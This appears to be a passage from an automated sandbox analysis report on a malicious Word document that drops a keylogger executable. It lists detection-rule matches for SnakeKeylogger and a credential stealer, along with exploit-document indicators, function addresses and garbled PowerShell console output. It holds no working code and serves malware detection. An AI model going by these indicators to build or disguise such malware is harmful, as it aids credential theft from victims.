                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_020E482029_2_020E4820
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_020E7A2029_2_020E7A20
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_020E963029_2_020E9630
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_020E004029_2_020E0040
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_020E324029_2_020E3240
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_020E644029_2_020E6440
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_020E964029_2_020E9640
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_020E1C6029_2_020E1C60
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_020E4E6029_2_020E4E60
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_020E806029_2_020E8060
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_020E387029_2_020E3870
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_020E068029_2_020E0680
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_020E388029_2_020E3880
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_020E6A8029_2_020E6A80
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_020E22A029_2_020E22A0
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_020E54A029_2_020E54A0
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_020E86A029_2_020E86A0
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_020E0CC029_2_020E0CC0
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_020E3EC029_2_020E3EC0
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_020E70C029_2_020E70C0
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_020E8CD029_2_020E8CD0
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_020E28E029_2_020E28E0
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_020E5AE029_2_020E5AE0
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_020E8CE029_2_020E8CE0
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_020E130029_2_020E1300
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_020E450029_2_020E4500
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_020E770029_2_020E7700
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_020E2F2029_2_020E2F20
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_020E612029_2_020E6120
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_020E932029_2_020E9320
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_020E194029_2_020E1940
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_020E4B4029_2_020E4B40
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_020E7D4029_2_020E7D40
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_020E355029_2_020E3550
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeCode function: 29_2_020E036029_2_020E0360
                Source: tmpD135.tmp.10.drOLE indicator, VBA macros: true
                Source: ~WRF{1C83C99B-998E-4DEF-B324-E69763DD529E}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                Source: tmpD135.tmp.10.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                Source: 10.2.swagodi78811.scr.316cb90.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 10.2.swagodi78811.scr.316cb90.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 10.2.swagodi78811.scr.316cb90.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 20.2.swagodi78811.scr.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 20.2.swagodi78811.scr.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 20.2.swagodi78811.scr.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 10.2.swagodi78811.scr.3129570.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 10.2.swagodi78811.scr.3129570.6.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 10.2.swagodi78811.scr.3129570.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 10.2.swagodi78811.scr.316cb90.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 10.2.swagodi78811.scr.316cb90.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 10.2.swagodi78811.scr.316cb90.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 10.2.swagodi78811.scr.3129570.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 10.2.swagodi78811.scr.3129570.6.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 10.2.swagodi78811.scr.3129570.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 00000014.00000002.663140063.000000000042B000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0000000A.00000002.412121084.0000000003129000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: swagodi78811.scr PID: 3468, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: swagodi78811.scr PID: 3880, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9F4A4ED3.doc, type: DROPPEDMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\swagodi[1].doc, type: DROPPEDMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
                Source: swagodi[1].scr.9.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: swagodi78811.scr.9.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: gRpkBp.exe.10.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 10.2.swagodi78811.scr.3508af0.7.raw.unpack, fgdXJt4fnOeV6XjIJC.csSecurity API names: _0020.SetAccessControl
                Source: 10.2.swagodi78811.scr.3508af0.7.raw.unpack, fgdXJt4fnOeV6XjIJC.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 10.2.swagodi78811.scr.3508af0.7.raw.unpack, fgdXJt4fnOeV6XjIJC.csSecurity API names: _0020.AddAccessRule
                Source: 10.2.swagodi78811.scr.3483cd0.5.raw.unpack, fgdXJt4fnOeV6XjIJC.csSecurity API names: _0020.SetAccessControl
                Source: 10.2.swagodi78811.scr.3483cd0.5.raw.unpack, fgdXJt4fnOeV6XjIJC.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 10.2.swagodi78811.scr.3483cd0.5.raw.unpack, fgdXJt4fnOeV6XjIJC.csSecurity API names: _0020.AddAccessRule
                Source: 10.2.swagodi78811.scr.4630000.8.raw.unpack, fgdXJt4fnOeV6XjIJC.csSecurity API names: _0020.SetAccessControl
                Source: 10.2.swagodi78811.scr.4630000.8.raw.unpack, fgdXJt4fnOeV6XjIJC.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 10.2.swagodi78811.scr.4630000.8.raw.unpack, fgdXJt4fnOeV6XjIJC.csSecurity API names: _0020.AddAccessRule
                Source: 10.2.swagodi78811.scr.4630000.8.raw.unpack, FUjasOohxIjsRf91GS.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 10.2.swagodi78811.scr.3483cd0.5.raw.unpack, FUjasOohxIjsRf91GS.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 10.2.swagodi78811.scr.3508af0.7.raw.unpack, FUjasOohxIjsRf91GS.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: taskeng.exe, 00000015.00000002.663024979.0000000001DAB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .VBp/
                Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winDOC@25/31@68/10
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$der072724.docx.docJump to behavior
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeMutant created: NULL
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeMutant created: \Sessions\1\BaseNamedObjects\eHfEjmAxzKFnFihZXpoZa
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR7C40.tmpJump to behavior
                Source: order072724.docx.docOLE indicator, Word Document stream: true
                Source: ~WRF{1C83C99B-998E-4DEF-B324-E69763DD529E}.tmp.0.drOLE document summary: title field not present or empty
                Source: ~WRF{1C83C99B-998E-4DEF-B324-E69763DD529E}.tmp.0.drOLE document summary: author field not present or empty
                Source: ~WRF{1C83C99B-998E-4DEF-B324-E69763DD529E}.tmp.0.drOLE document summary: edited time not present or 0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................L.......1B.........................s............................................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................L.......=B.........................s............................................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................PB.........................s............................................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................\B.........................s............................................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................nB.........................s............................................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................{B.........................s............................................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................a.g.a.i.n................................B.........................s............................................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................B.........................s............................................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1..........B.........................s.................... .......................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................L........B.........................s............................................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................B.........................s............................................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................B.........................s............................................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~......B.........................s....................$.......................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................B.........................s............................................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................C.........................s............................................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................C.........................s............................................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s....................2.......................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................4C.........................s............................................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................FC.........................s....................l.......................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................RC.........................s............................................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............................eC.........................s............................................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................qC.........................s............................................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....d.......l................D.........................s............................................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....d.......l..............."D.........................s..............".............................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....d.......l...............4D.........................s............................................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....d.......l...............@D.........................s..............".............................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....d.......l...............RD.........................s............................................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....d.......l...............^D.........................s..............".............................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................a.g.a.i.n.......d.......l...............pD.........................s..............".............................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....d.......l...............|D.........................s..............".............................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1..........D.........................s.............."..... .......................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....d.......l................D.........................s..............".............................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....d.......l................D.........................s............................................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....d.......l................D.........................s..............".............................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~......D.........................s..............".....$.......................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....d.......l................D.........................s..............".............................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....d.......l................E.........................s............................................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....d.......l................E.........................s..............".............................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s..............".....2.......................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....d.......l...............7E.........................s..............".............................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....d.......l...............IE.........................s....................l.......................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....d.......l...............UE.........................s..............".............................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....d.......l...............hE.........................s..............".............................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....d.......l...............tE.........................s..............".............................Jump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ................ .......................(.P.....................t........=................................................................".....Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..".....................................(.P............. ................l.........................s..............".............................
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P............. ................l.........................s..............4...............".............
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..".....................................(.P............. ................l.........................s..............".............................
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P............. ................l.........................s..............4...............".............
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..".....................................(.P............. ................l.........................s..............".............................
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P............. ................l.........................s..............4...............".............
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................a.g.a.i.n............... ................m.........................s..............4.............................
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P............. ................m.........................s..............4.............................
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.........-m.........................s..............4..... .......................
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P............. ...............9m.........................s..............4.............................
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..".....................................(.P............. ...............Nm.........................s..............".............................
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P............. ...............em.........................s..............4...............".............
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.....wm.........................s..............4.....$.......................
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P............. ................m.........................s..............4.............................
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..".....................................(.P............. ................m.........................s..............".............................
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P............. ................m.........................s..............4...............".............
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s..............4.....2.......................
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P............. .......D........m.........................s..............4.............................
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..".....................................(.P............. ................m.........................s..............".....l.......................
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P............. ................m.........................s..............4...............".............
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P............. ................m.........................s..............4.............................
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P............. ................n.........................s..............4.............................
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....x.......X...............,j.........................s............................................
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....x.......X................j.........................s............H...............................
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....x.......X................j.........................s............................H...............
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....x.......X................j.........................s............H...............................
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....x.......X................j.........................s............................H...............
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....x.......X................j.........................s............H...............................
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................a.g.a.i.n.......x.......X................k.........................s............H...............H...............
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....x.......X...............'k.........................s............H...............H...............
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.........Wm.........................s............H....... .......H...............
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....x.......X..............."n.........................s............H...............H...............
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....x.......X...............4n.........................s............................H...............
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....x.......X...............@n.........................s............H...............................
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.....Sn.........................s............H.......$.......H...............
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....x.......X...............`n.........................s............H...............H...............
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....x.......X...............rn.........................s............................H...............
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....x.......X...............~n.........................s............H...............................
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s............H.......2.......H...............
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....x.......X................n.........................s............H...............H...............
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....x.......X...............~o.........................s....................l.......H...............
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....x.......X................o.........................s............H...............................
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....x.......X................o.........................s............H...............H...............
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....x.......X................o.........................s............H...............H...............
                Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ....................|.4.........E.R.R.O.R.:. ...........,................^......................................(.'.......................4.....
                Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ....................|.4.........E.R.R.O.(.P.............,................^..............................................j.................4.....
